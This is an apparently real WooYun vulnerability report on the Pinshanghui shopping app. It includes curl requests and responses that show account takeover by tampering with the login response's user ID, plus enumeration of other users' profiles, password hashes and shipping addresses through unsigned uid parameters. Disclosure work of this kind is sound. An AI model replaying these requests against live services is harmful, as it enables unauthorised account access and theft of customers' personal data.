当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0192848

漏洞标题:品尚汇某处漏洞导致越权操作任意用户帐号,遍历全部用户收货地址

相关厂商:深圳品尚汇电子商务股份有限公司

漏洞作者: 路人甲

提交时间:2016-04-06 11:41

修复时间:2016-05-21 11:50

公开时间:2016-05-21 11:50

漏洞类型:网络设计缺陷/逻辑错误

危害等级:高

自评Rank:15

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-04-06: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-05-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

深圳市品尚汇电子商务股份有限公司(股票代码:833788)是中国高性价比进口产品电商。公司于2009年11月在广东深圳成立,2010年4月,官网正式上线,主营进口葡萄酒、啤酒、牛羊肉、生鲜产品等品类。目前公司拥有两大销售平台:B2C平台品尚汇;B2B平台店省省,完成B2C+B2B整个垂直电商生态系统构建。

详细说明:

问题出在APP上
注册登录看一下接口
curl -H "Content-Type: application/x-www-form-urlencoded" --data-binary "password=123456&username=weixinV9ZVWJNR5U" http://psapp.wine9.com/index.php/User/login/ce16f73b5c31c37760f811d6c6f80b39
看返回
HTTP/1.1 200 OK
Date: Tue, 05 Apr 2016 11:25:37 GMT
Server: Apache
Vary: Accept-Encoding
Content-Encoding: gzip
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 89
{
"code": "0",
"message": "ok",
"result": {
"Code": "0",
"Message": "1550325"
}
}
没有token session之类的东西,只有一个用户id
这个id还是连续的
从社区入手,找几个版主之类的

32F1D6ECC7373262729B11E525BC923D.png


就找个这个兔子了
从这个接口中得到
http://psapp.wine9.com/index.php/BBS/GetReplyList/ce16f73b5c31c37760f811d6c6f80b39?id=2874&index=1&pagesize=10
userid

屏幕快照 2016-04-05 下午7.30.50.png


再登录时,改包
{
"code": "0",
"message": "ok",
"result": {
"Code": "0",
"Message": "647836"
}
}
接下来,就如同登录上了一样的,看订单,下单什么都可以,用积分去交换都行。

4D9B688A91C16215183413E486ABEC67.png


F0E46125271C68F375EBDB799D58C8D2.png


再试几个主要的接口,发现其实是可以遍历的。这几个关键的接口都没有签名
比如查看用户信息:
curl http://psapp.wine9.com/index.php/User/getUserInfo/ce16f73b5c31c37760f811d6c6f80b39?session_id=0c64a3fad5aef75202bb2a7175035634&sign=bea76696f05aeff6d42c8aa951010b09&uid=647836
这个uid随便改

屏幕快照_2016-04-05_下午7_39_08.png


password是什么呀salt这些都返回啦。。。
不知道是哪种编码,,关键信息加*了。看不到
再看一下接口,查找收货地址的
curl http://psapp.wine9.com/index.php/User/GetAddressList/ce16f73b5c31c37760f811d6c6f80b39?index=1&pagesize=10&sign=bea76696f05aeff6d42c8aa982d1410e&uid=2262620
居然这个uid也可以随便改的
我试了几个有地址的
http://psapp.wine9.com/index.php/User/GetAddressList/ce16f73b5c31c37760f811d6c6f80b39?index=1&pagesize=10&sign=bea76696f05aeff6d42c8aa982d1410e&uid=1550325

屏幕快照 2016-04-05 下午7.44.31.png


http://psapp.wine9.com/index.php/User/GetAddressList/ce16f73b5c31c37760f811d6c6f80b39?index=1&pagesize=10&sign=bea76696f05aeff6d42c8aa982d1410e&uid=2227655

屏幕快照 2016-04-05 下午7.46.35.png


漏洞证明:

再换几个

B6B67E3CB7DFF838CA5BD164F4A2FB34.png


02E21E8475F93658AC75BF0393BAC8B0.png


修复方案:

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝

漏洞Rank:15 (WooYun评价)